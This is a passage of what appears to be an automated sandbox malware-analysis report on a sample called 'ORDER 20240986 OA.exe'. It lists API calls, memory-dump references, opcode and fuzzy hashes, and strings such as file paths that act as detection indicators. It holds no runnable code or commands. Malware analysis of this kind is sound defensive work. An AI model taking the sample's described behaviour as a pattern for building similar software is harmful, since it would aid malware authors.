                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi
                                                                                                                                                  • API String ID: 542301482-3393217848
                                                                                                                                                  • Opcode ID: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                                                                                                  • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                                                                                                  • Opcode Fuzzy Hash: 6726bf14e95c28a8eef9ad412ca65ffc9ea6cc976661a48ac6a4b746f0d58001
                                                                                                                                                  • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                                  • Opcode ID: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                                                                                                  • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                                                                                                  • Opcode Fuzzy Hash: 512375b0d91e1f35eaafe1d2d9ea6627de5ab3dbf7b488781e982afef0b9970b
                                                                                                                                                  • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A
                                                                                                                                                  APIs
                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040446B
                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040449C
                                                                                                                                                  • GetSysColor.USER32(?), ref: 004044AD
                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404550
                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045CF
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045EB
                                                                                                                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 0040461A
                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                  • String ID: Call$DC@$N
                                                                                                                                                  • API String ID: 3103080414-3199507676
                                                                                                                                                  • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                                  • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                                                                                                  • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                                                                                                  • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                                                                                                  APIs
                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                  • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                  • String ID: F
                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                  • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                                  • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                                                                                  • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                                                                  • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                                                                                  APIs
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                                                                                                    • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                                                                                    • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                                                                                                  • wsprintfA.USER32 ref: 00405F62
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                                                                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                                                                                                                                    • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ORDER 20240986 OA.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                                    • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                                  • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                                                                                  • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                                                                                                  • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                                                                                                                                  • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                                                                                                  APIs
                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00403347,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00403347,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00403347,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\ORDER 20240986 OA.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 589700163-2421632516
                                                                                                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                  • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                  • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004042D0
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                                                                                                  • GetSysColor.USER32(?), ref: 004042FB
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404325
                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                  • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                  • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                                                                    • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                  • String ID: 9
                                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                                  • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                                  • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                                                                                                  • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                                  • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB24DA
                                                                                                                                                    • Part of subcall function 6FBB122C: lstrcpynW.KERNEL32(00000000,?,6FBB12DF,00000019,6FBB11BE,-000000A0), ref: 6FBB123C
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 6FBB2460
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FBB247B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
